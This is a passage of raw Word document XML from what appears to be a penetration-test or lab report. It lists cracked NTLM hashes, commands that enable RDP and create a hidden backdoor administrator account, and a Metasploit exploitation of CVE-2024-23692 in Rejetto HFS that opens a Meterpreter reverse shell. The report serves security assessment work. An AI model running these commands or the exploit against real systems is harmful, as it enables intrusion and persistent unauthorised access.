              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDECEA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Administrator, DefaultAccount, Guest, WDAGUtilityAccount</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D0EDE4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D3B2E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Hash Format</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDECEA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">NTLM (Windows NT Hash)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D0EDE4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D3B2E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Cracking Tools Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDECEA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">John the Ripper, Hashcat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D0EDE4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D3B2E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE Reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDECEA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-522: Insufficiently Protected Credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A7A5E"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3  Remote Desktop Protocol Activation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">To establish graphical control over the target, RDP was enabled through registry modifications and firewall rule updates. A hidden administrator account was also provisioned:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9360"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
          <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
          <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
          <w:right w:val="single" w:color="1A7A5E"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Activate RDP via registry key</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reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server"</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/v fDenyTSConnections /t REG_DWORD /d 0 /f</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The operation completed successfully.</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Permit RDP through the host firewall</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netsh advfirewall firewall set rule group="remote desktop" new enable=Yes</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Updated 3 rule(s). Ok.</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Create a hidden backdoor administrator account</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net user ifti pa$$w0rd /add</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net localgroup administrators ifti /add</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net localgroup "Remote Desktop Users" ifti /add</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A7A5E"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.4  Automated RDP Module</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The post/windows/manage/enable_rdp Metasploit module was additionally run against Session 2 to automate the RDP-enablement process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9360"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
          <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
          <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
          <w:right w:val="single" w:color="1A7A5E"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msf &gt; use post/windows/manage/enable_rdp</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msf post(windows/manage/enable_rdp) &gt; set session 2</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msf post(windows/manage/enable_rdp) &gt; run</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A7A5E"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.5  CVE-2024-23692 — Rejetto HFS Unauthenticated RCE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A secondary attack vector was uncovered and exploited. The target was running Rejetto HTTP File Server version 2.3m, vulnerable to CVE-2024-23692 — an unauthenticated Remote Code Execution flaw triggered via a specially crafted template-injection payload in the HFS macro language:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9360"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
          <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
          <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
          <w:right w:val="single" w:color="1A7A5E"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msf &gt; use exploit/windows/http/rejetto_hfs_rce_cve_2024_23692</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msf exploit(...) &gt; set RHOSTS 192.168.40.140</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msf exploit(...) &gt; set LHOST 192.168.40.136</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msf exploit(...) &gt; exploit</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The target is vulnerable. Rejetto HFS version 2.3m</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Meterpreter session 1 opened (192.168.40.136:4444 -&gt; 192.168.40.140:65470)</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1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="8B0000" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠  SEVERITY: CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D0EDE4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D3B2E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDECEA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE-2024-23692</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D0EDE4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D3B2E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Affected Software</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDECEA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Rejetto HTTP File Server (HFS) v2.3m</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D0EDE4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D3B2E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Disclosure Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDECEA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">25 May 2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D0EDE4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D3B2E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Attack Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDECEA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Network (no authentication required)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D0EDE4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D3B2E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Access Obtained</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDECEA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Meterpreter shell with full SYSTEM-level privileges</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D0EDE4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D3B2E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDECEA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">9.8 — Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D0EDE4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D3B2E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE Reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDECEA" w:val="clear"/>
